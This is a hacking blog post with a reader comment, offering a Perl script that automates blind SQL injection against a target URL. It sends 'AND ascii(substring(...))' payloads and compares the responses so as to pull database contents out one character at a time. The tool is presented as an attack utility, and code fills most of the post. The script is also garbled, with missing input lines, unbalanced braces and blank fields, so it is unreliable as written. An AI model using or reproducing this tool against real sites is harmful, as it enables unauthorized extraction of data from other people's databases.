Simplifier Blind SQL Injection By Xianur0

Posted on 17:02 by Xianur0

English: This tool converts Bug Blind SQL Injection in a SQL Injection ordinary and gives you data output that is not limited only to Boolean jaja

Spanish: Esta tool simplemente convierte los bugs Blind SQL Injection en SQL Injection comunes y te da salida de datos que no solo se limitan a booleanos jejejejeje.

Una Obra Maestra :P
A Masterpiece :P


#Xianur0 CYS # perl
#Blind SQL Injection converter to SQL Injection
#Please Have Patience, running.........

# By Xianur0

use LWP::UserAgent;
$debugmode = "false";
$ua = LWP::UserAgent->new;
$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv: Gecko/20080829 Firefox/");
$url = $ARGV[0] || die("Use: [URI]\nExample:\n");
print "\nBlind SQL Injection converter to SQL Injection By Xianur0\n\n";
print "\nEnter the SQL Injection please:\n";
print "\nEnter the Detector please:\n";
print "\nPlease Have Patience, running.........\n";
$caracter = 1;
$simbolo = ">";
while($caracter ne "finito") {
if($debugmode eq "true") { print $url.'/**/AND/**/ascii(substring(('.$sql.'),'.$caracter.',1))/**/'.$simbolo.'/**/'.$i."\n";}
$req = HTTP::Request->new(GET => $url.'/**/AND/**/ascii(substring(('.$sql.'),'.$caracter.',1))/**/'.$simbolo.'/**/'.$i);
$req->header('Accept' => 'text/html');
$res = $ua->request($req);
if ($res->is_success) {
if($res->content !~ $detector) {
if($base eq $i) { print chr($i); $caracter++; $i=0; $simbolo = ">";}
$base = $i;
$i = $i+10;
} else { if($i eq 0) { print "\nError Performing Blind (Less Value to 0)!\n"; $caracter = "finito";} else {$i = $i-1; $simbolo = "=";}
} else {
print "\nError detected in HTTP requests: " . $res->status_line . "!\n";

print "\nFinished!\n";

1 comentarios:

_84kur10_ dijo...

XDXDXD ajajaj joder tio, pues si haces lo que dices es genial, :P la probare haber